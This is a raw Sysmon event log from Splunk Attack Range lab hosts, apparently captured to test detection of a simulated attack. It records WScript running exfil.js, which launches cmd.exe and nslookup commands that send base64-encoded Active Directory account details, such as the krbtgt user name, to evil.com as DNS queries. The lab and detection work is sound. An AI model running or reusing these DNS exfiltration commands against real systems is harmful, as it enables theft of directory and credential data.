evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AD-629A-8A3E-000000005F02}7620C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldgkc.tmp 2>&1 23542300x8000000000000000196020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.017{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7083919C567B98C25285E128B73EF5C,SHA256=FB66D48DA2D7B00D3F2B60D59BC3AA86FB8A183B26BAF6B9DC7B2B54C6CF7688,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043916Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:14.089{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDF216EEEB6117F44AEFF8FEE716B90B,SHA256=F38BA87B76B57A61861C73748E75A9073EC7A69FA7401FA2E258A1642121DB88,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.989{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-BD3E-000000005F02}6200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.989{2E1864BB-17A1-629A-783D-000000005F02}55524152C:\Windows\System32\WScript.exe{2E1864BB-17AF-629A-BD3E-000000005F02}6200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.991{2E1864BB-17AF-629A-BD3E-000000005F02}6200C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlicde.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.973{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqsnppf.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.926{2E1864BB-17AF-629A-BB3E-000000005F02}5588732C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-BC3E-000000005F02}7848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.903{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.903{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.903{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.903{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.903{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-BC3E-000000005F02}7848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.903{2E1864BB-17AF-629A-BA3E-000000005F02}35882036C:\Windows\system32\cmd.exe{2E1864BB-17AF-629A-BC3E-000000005F02}7848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.916{2E1864BB-17AF-629A-BC3E-000000005F02}7848C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AF-629A-BA3E-000000005F02}3588C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqsnppf.tmp 2>&1 10341000x8000000000000000196423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.857{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AF-629A-BB3E-000000005F02}5588C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.857{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AF-629A-BB3E-000000005F02}5588C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.857{2E1864BB-17AF-629A-BB3E-000000005F02}5588732C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-BA3E-000000005F02}3588C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.825{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-BB3E-000000005F02}5588C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.825{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-BA3E-000000005F02}3588C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.825{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.825{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.825{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.825{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.825{2E1864BB-17A1-629A-783D-000000005F02}55525736C:\Windows\System32\WScript.exe{2E1864BB-17AF-629A-BA3E-000000005F02}3588C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.825{2E1864BB-17AF-629A-BA3E-000000005F02}3588C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqsnppf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.820{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlguqmpu.tmpMD5=FB87DC05AA42B3CEFD4C629E53F524B0,SHA256=D8FD32DBA2A6AFDF9B6B8FFC9EECC534FF5A98DB8AFE74AF80C8BC0F2B8F0CBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.788{2E1864BB-17AF-629A-B83E-000000005F02}48605200C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-B93E-000000005F02}5912C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.788{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.788{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.788{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.788{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 